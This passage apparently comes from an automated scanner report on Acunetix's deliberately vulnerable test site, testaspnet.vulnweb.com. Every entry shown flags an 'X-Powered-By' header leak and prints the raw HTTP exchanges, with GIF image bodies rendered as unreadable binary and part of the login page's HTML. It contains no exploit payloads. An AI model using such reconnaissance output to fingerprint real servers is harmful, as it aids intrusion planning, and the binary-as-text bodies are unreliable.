          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        10. GET http://testaspnet.vulnweb.com/images/comment-after.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (347 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-after.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "2c6507199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1957
          
          
          Response body (1957 bytes)
          GIF89aôÕÿÿÿ€`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâóìçòìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìù÷õöñìõðëùøõïèâøõñù÷öðéãíäÝ÷õñõñëûûùëâÙøõðùøöîäÝðèãîäÞéÞÕæÚÏíäÞéßÔûúùçÜÒ÷õðöðëçÛÑïéãëáÙëâØçÜÑ!ù,ôÿÀ@ŀ0
          C¢eXDN„Å0}§I¤ôIµ *ɨIT>§Çfж†ÕU¢¸\ñ~+ͣֈ¿Ö­c't^PZYPCKMherF^ŠNv[Zbxr_\H2fc“i…`¤MY\yUn•G”h‘O'‹VTl{kL[·Wz¬¤T¸di›c…Lƒ¡«¹e”T'¹¨}}cšLeyR»ÝiڎH­â¼ÕŸr’{CªTuËD
          "
          
          ð§@ …}þâã°¯à@!*PHA„½ƒ ª(ÈñGâë80#Ȃ@âË1ä~ø~tˆÒa@cܗ³ …ÿ?|\9r"É8#ò<HS⽃0Ê<À‚Š…S2‘âϝ:ïuÉ¦‚{â«ˆ3#ДoêĹvߨ†ýIMê“!ڑpGÆäHpèI½‚&(§B·/ˆØ/oÛ»-Ꜭùç³zµNTêsѝU¤T+—kÀŸ>ÿ%u©àê蟫%vݺé\
          è-Ž!(ǀ@óæ’/Àb¸óä†'WN`Áqï$xçÎÝz÷æÒ½/¿~½óñ!ÔcÞ]ùðöâíw¿<}õᕷ@|ï•]tÓ鷜wٍނÖ%Gà~¤À_vöWyåÙÇÿžxnÈ¡ˆÚ½ &ÞWžñ©HsNG
          ¢‡`v8]ƒÇag†Èm(ÞxÛgކ.vGcw	ޗށN6Bsæ59¢u¨ÓmǞvOòG$’!>6Jø¤†*V蠆ÎAWߐc¾éœr¤€g}ê¹GƒÊ@j(…n`袈"Z¨£‹2zh¤lÐ(¥“
          à(¢P
          	™V
          ª¢
          àÁ£¤
          Щ¦Ÿ>
          )£ŠB𪬮bJ«£–Æz(¨‰"zjª˜FJ뤲v°*­ºš*é¢\ª)±›‚Ú諅z`)«ª:;ë©Ø
          Pƒ®·
          [굅Öp걏v:ÿì²âB@n¯Ý.ún¥Ýþo¦ÃÊêÁ´Ï–Úï¡ÎvÊ-·¤"š,µ¬Z+ª›B+v
          쩘p°ýrªª ƒ>à@„²Ç
          DÁ
          4ðqÈ&G2Ê0; sÐ|2Í!¯ü±¸ŒòÉ${\sÉ&—œ2È*¯\rÍ(ƒ|³Ì<ˬ²Ð2‡,´É(\4ÏGGÝsÖE'­òÔ]m2Ï-{ýsÓI{ítÌ?kÍsÏ./}4ÍLÓ}rÕã,wÖc¿ŒuÊs×\õÇ k=¶Ç=/M3ÑFs]³ÏN'ÎôÌ=K=òØJ¿,5Ì)û|òÈ>®óÛ3#½sæ.ÍxèCK]¸ì6¿>ÿ2â*·ž5Ø"çŽùÍD³œ8Ö\ßMrñ6ã4Ú8yÎ-O­sãxCÝúÒ9gï5ǃ0|?Þ~øã—Ï@æþ÷°/>øò£Ÿúð¯o~ùÞ£ÿÿüƒß÷È÷>óáO|üc0‚ÈoLŸÿ8?F0|
          쟂ðyðõÛß÷H?V°ôà	ý§Bï±/…üúX ?
          ^0‚tßûØBê/…¬¡pށì 	;ˆ?!Öðˆ´!ÿFpD"±‚$_
          yÈÁþm‘ò{áÈ?&
          P}¡o¨DŠ<…8ÃæÿŒõã€	 HÀü8
          ü1-(@
           ?þ‹|d9I@úq’”t¤#%	HN.R‚$#)Iò‚œ$(¹IE“‹le IÉJþ”“œÀ
          þ¨IEÒҗ¶4dvIËT:2—\eILR™ŸLd*)Jj>ó—‘&%IyÌJž2’©ü¥/ÅùÈVÆ2’üc3‡yËc’ÀÎ´%*·™ÍQž¤´¥3yyMEjSŸéÌä2½¹OWj•ð<e:}II~ „§.]ùÍ[º²¦¬e.CIH`N²™Ë4¤HÑYÈ.¤³lh IªÊ\6’‘ÂòL=öHSšÒã¦8Í©NwÊӞúô§@
          ªP‡JÔ¢õ¨HMªR—ÊÔ¦:õ©PêRQ€  (xjM·ÊÕ®zõ«`
          «XÇJÖ²šõ¬hM«Z×ÊÖ¶ºõ­p«\çJ×®ÀxAfZ×¾úõ¯€
          ¬`KØÂö°ˆkf0Ø@‰¬d'KÙÊZö²˜ÍìVð‚ðU³ 
          ­hGKÚҚ֯œ…ìiWËÚÖºöµ°ìgcKÛÚÚö¶¸u­jû;
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        11. GET http://testaspnet.vulnweb.com/images/comment-before.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (348 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-before.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:54 GMT
          Accept-Ranges: bytes
          ETag: "6a79f47099c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1919
          
          
          Response body (1919 bytes)
          GIF89aôÕÿÿÿ€`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâòìçóìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìöñìù÷õõðëùøõïèâøõñù÷öðéãíäÝõñë÷õñûûùîäÝðèãùøöøõðîäÞûúù÷õðöðëíäÞïéã!ù,ôÿ@€pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒB‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬§H	±²	,	±²³¾Â	¾Æ³±ÆÇÁÁųϾµ¶¿ºÅ0µºµÆÓ¿Î½¸Ë¾à´½ÇÈ²ÓÆ(²Í½çñé¹îçÜÁì´Þ	¹$Ëtõ“Æ‹²jÊ#VïØ5}È´ã&/^EaàÈ& =uúHä
          ˜n›C†Öf¼–.à;…½¶äÈÌ_D—án©c<ÿŤÍ6²]8‰êÂȆ޵[óŒô—«êF\2}M5”ÖÕnì€ý*™R‘0` vˆ´jײu—A†¸#ÖªÍp·íÚ¾s3ÌÝk7.Ü´s+>¼Wí[½q·=Ì Å€úZfL7ñe¿™9³ÅŒ¸4lS+lX-濓A#†œZvâÚiïÒ­xnо¥EsfœW¯dܙӖ<ô€©O†Œ:6êÁ́K‡üðé¹§ƒ~ÝøñӈÍî«ÛsöÃ×וì:¹ðêiA€g,÷xsߔ¶`À
          8ðÀ‚
          "è@<à€	.aJ¨aFÐÿ€‡z¸`…	6ð†Fè ‚>áƒ*Ha…~(¡‚!rh"‡²Èá‚,B(a‚/šãŽ'ùâŒöx$Œšx!’)Þ8#’8n˜"‘&žˆa1zh£—þˆ ˆ\Ùd†BNØå‡?&¨ ‘M"xbº£‘¢ˆãœ6vx"
          6Ic†<j8!Š6ˆ¢š$fÙ¡Œ%Š¡Šv.Ú"or
          b¦
          ÊIá¥C*Éਂ†è¢…s
          id˜¾
          ¢ˆ*J)"Œ{Žxa$Þ)¦Ž—Ö8â°H@$«,Én ì³Ì2›¬´ÏB»lµl-¶×
           -³`A	ÝfK®³Ó
          àÿÁ´è
          ®·ãNK-´ÎB0¯½òr‹¯´ÚÖ»,¹Í2»n»ÜV‹ïµörð.¾þªkí³lë-Âߒí¼Éz -¼îJ|ïºð‚¿ûœîÆÉ¾°îÂӆ{ðÃ&C€rÀ!?;s¶!\s·ÛëÁŧô²‡2Èè2Û0Ƽ›/»ßRlòÐØ†Kðº”PtÁAƒën, 6!`‚¤°Í6h/€Á
          b·6b£6˜Ý·ô½÷ÞuóÍvÜ}/¸âŠ·-x‰c7ßi‹Íxà•ó¸ÞƒOž8à„/¹ã&À
          ·Ü™«Ý7ނÿ­zÝh®9+lŽÿwå‚S>8á•/øíºï|ގƒÞyñ–.äɏ½öîríBŽ÷õd¿ÍºÙwW~ûÙº.¸Þe®{ó|OÏ7ê–#nzûl‡Àváì_÷¥§=ºÜz/ž·û›ßù€ç:¸I z±s_î’G»Öå®mo£œøèÀ¶¥M+¸ å׸Á­.m @ (@ À.ð@…
          p!N¨Â’°'Œá]¨C*À†gxª †H\!p’0‰/,"cx&’°ˆ<lâRHB.Q‡TÔa]ÈÃ.¾ð„eŒ!.PÄ,ñŠOü!HÆ¢ÿq†`ôágÈÅzñ8¤€
          nØÃ*âQUäáÏhÆ&²‹à¢F¸D6’0ˆd,"«Ã1š‘Œ—<á#sXDú±ŽjÄ!%ŸÈÉ'v‰0|ãMéJÖñ…N$£
          5ÙʈÀ…),e&G™Åšñ—Æ<2'iJCþЎ:DfÏCTђžDdרÆÖQ‹
          ä3×xM&òœÍÌã')@HTÀ0€<
          ðNxZàñD@<å©OXÀÿÜg<ÿYOzúsŸµ*PÏ~ꓞð´ç>ÿ9Ï|ö“ŸhC-Px:4¢PèB+ÏyTž$hHúPœ¤œ
          å§AÊÏwÞ3Ÿ¨Gå©P›êÓ"ÝéA
          êP’z´¥å)BéÙ‰>ô§)C¡šÏ‚"´¤ÕhPç	TŠötŸ'¸©@šTŒžô¢ø<èXjR¬B d…hEúИîŸ/­@S¯Zֈ '(+USšÒ‡Ÿ-©?Ϛ؊V§ô̪cÑØ¥zÔ§'}§UÒ»Â3A;
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        12. GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (328 bytes)
          GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "7228247199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2506
          
          
          Response body (2506 bytes)
          GIF89a2&æÿÿÿ€f@æÜÏá
          ???Í¿¬³¡ˆ¿¿¿„jEš„dâØÊàÕLJnJþþý†mIïïïÀ°šuRÚξ¦’vº©‘///ŸŸŸ___ÓÆµ­šOOO“|[Æ·£ÏÏϏßßß ‹m¯¯¯á	oooå1:æ:Bã$ä$-êU[èMTímráä*3øÊÌ큆æ/8ítzðŠâ!öÂÅüééâìdjò²´âçFMâêioò™üâãûÞßç@GèCJæBIö×Øï˜œé_eúæçó£§õ¼½ô¨¬â!ä(ã&áë`fòº½ùßáôÅÇùØÙñ £ï“˜ýïïýîïúììñ¦¨èHNñ­±÷ÓÔö²µüäåäýïðõÌÍò“˜üïïõ°³üíîï}‚!ù,2&ÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“–—˜™šƒ•žŸ ¡¢£¤¥¦§¨©ª«¬­­
          ³´µ¶·¸¹º»¼½¾¿À»
          ®ÅÆÇÈÉÊȰ²ÁÏÐÑÒÓÐÃËØÙÚÛÜ¡ÍÔàáâãÂÄÝçèéêŸßäî¶¿ïÒÖëûüýÆíøÞpÏ×A«™óǰá©p˜pÜÀ‚½
          ¨LŸÃ ? @2Â6ŠÁ]ü¥1å/ÉªÑтHi–ˆ	ɓT’FœŒåRÜJƒ‹ò‚Y,K™¢J•šƒEŒž”ø)‡‰*¥v4cÒ±¹˜¶“cª[·Dÿ„`e¨•Wu(Ñ+Ë«¥^\jW¥xKxª%sûÕ½›.ï__|wù}\+0*0
          k–J#ñ¾ÅûSÞY×äÑ,›Âlbóf.<«½Nt.  `Á·&XÐ ¨fù>ÜÖòZ+äd Â­Ó´>Ä`ü„\$PDÁ„	¿›÷R]*Ek×®“*áh$H jĉ$mP€Bå·_ èÇß'$€%”ø"€$]€Iž4˜I8Ø¡ˆ4˜@¡Œ°ß‚©Øv‹‡T€]
          \-pÝY\´À!؂އ4À›-4¢Áÿèè{£ÈߔN 1ʇ@Õ I¡`°A–@-˜ÀV¢ŒI(&I"„†`^€"‚Y€'izR×âI‹¨¸X‹FhðqLW“ÜIpÀpܘãŽÑ25z¢ÌCvÓ	àè¡Þ8Ë5
          PÞ£ã!êäzð½ð|±…b&&€a}g~R„øb’©+—ŸÔÉkЂo’Da´À^0"–!>H'wzbf¸˜é+‚ž:ˆu´,j¥@0ž¨ßµëä¤Bò8wG*—ªz§‘ ˆ,šjÁ³L'A½ñÂ(È«KÅjJ›©@CÿAÁÄ›ù(#‘ä­ž_2@€Øg~\™É˜¸&K@+Ë¢™m‚bæÈ´ùI.À¶Y+*/b*-ŸUu’=L)t‚tpËӝ~Êc
          ¨×.Ôñ’Ç0-óB\Î5©`aCa&´0ÊmV("ü)J	@1HÒÏe*«sÌòÊOÈ~’2£¤LnÏßþŒòV_n0ç*é0×dŸ5Ùù69µ¥ªæ6‘ð~ ˆ§·ì«Üé¸`ÍyZ“òÛ\x3¤071@QX
           ‹ ()´ß£¸Ü·ñb7„G„ÀôÔc(,òy‚BÉ"»R¹ê¸8:ÿ¼¹à;¨¾‰ær©Öðº^¾ 7Ýï¢R?û(:¦‚'.¸ƒ'5(LpܘKd^ò3æe/Ï֚²t=» 	\¢ÀPÀâ½£‘†;ïƒøLS¿ZX}K£¼&c¾Îé(iž»J1´¡b0„ùº@˜"xB…¹A7@
          3%ðÊÅ	‡AQD$(€§HÅ
          2æ$@Î^áA]ŒÐâ›ÅqÑB1¢#¶Èû¾&€ù™PÉa’ÕnÁ¤×æ~¢XAa¤€æF@
          Ä#^ÉduB"evA¾y≅Cã°x2î`r”ëb.æÆY̋ÿcWEIDQ­¸0]úf1™$ãAeT	2ÒðlªXÛ[	f@Ba€Ð’T(Å+&F¶ÀeŠÂzt$žk"Œ™d˜€/‹ÎàÖÐ8¶OlÁYÝ*i1ÑõHi©«ÚÇGJV²Î“·„@ªìx(â	…!ŠP*€…±‚Þ¶ù‰º™LƒøfŠôdMí­‘΋¤Ì0é	q0?Øc¨™2‡ž]š„¥ @Њ|ˆ¢À«>`YèSž§BÔͨ´zAÀa
          `ØiP…ÓxPUÃZ:P/`ꖺðç'|I˜#@ïÿ™Ê
          <AÕ·ÓpÖ*PvÅ<qà.!¢'"P²-ŽC[lž5:´ÉEK‹i^#Ê¡:ÅÕháä£T…(
          µx—qtCsg_H¥¤©6ž|Àwì1ˆ ”ˆpŸýlx
          ?¦3½ÌêLðU]¾Å	Ê0t%2o{@}š[)E¢>Ë( lK$X¼ê“6ÃÅV¿5÷’™¬`ßUœ`ç•DØW‚Ùb ޙWgë9$ìc£ÅQ	a¨ÂŽ´¦RU?Z
          BôTÞâQ À’Ä
          µ§,‘ôdŠœBAÉGj´vZÙÿrýô`A±h¥¨- P	Lå	`ô§ °‡:i Øq0Ð	Äø³¸˜€Œ€œÞ¸÷Žð-Åì;•&$òu‹Ed †CQ‚Hñ@ý¤x‚c&c"xrNÄ
          £æ/îdڏû‰GQ\Á-&؂*º•hA6xî tÏÌçYp-½–ƒßKÚ,Š%A*èA~SaÀ 	+ÐÁ‘óLiU˜¹ÏJqØÂjá0râ²Ò Æó¥1í¢nv;Åá'›ƒêVƒdÔ¤N	MaÌÕÐÕ¸.sJcëzØQ84«sMìÚìš×ȆT‹'ÍìlÀ:ÙÐN
          ¡›Mme<;ÚȶÆ&¶Íín{ûۆ¨¸ÇMîrS";
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        13. GET http://testaspnet.vulnweb.com/images/rss.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (318 bytes)
          GET http://testaspnet.vulnweb.com/images/rss.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "8e76327199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 134
          
          
          Response body (134 bytes)
          GIF89a¢ÿfÿÿÿÿȤ?}3ÿšW!ù,K(ºÜþ‚@«½8ËÌ»Ý^ˆT`šÖ™¢ßT±pP–2PS¤]Ç{å'Ÿî6ü¹h:Œ0YîvH[wd2U¯eN$Úr=’xL.›Ï„;
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        14. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 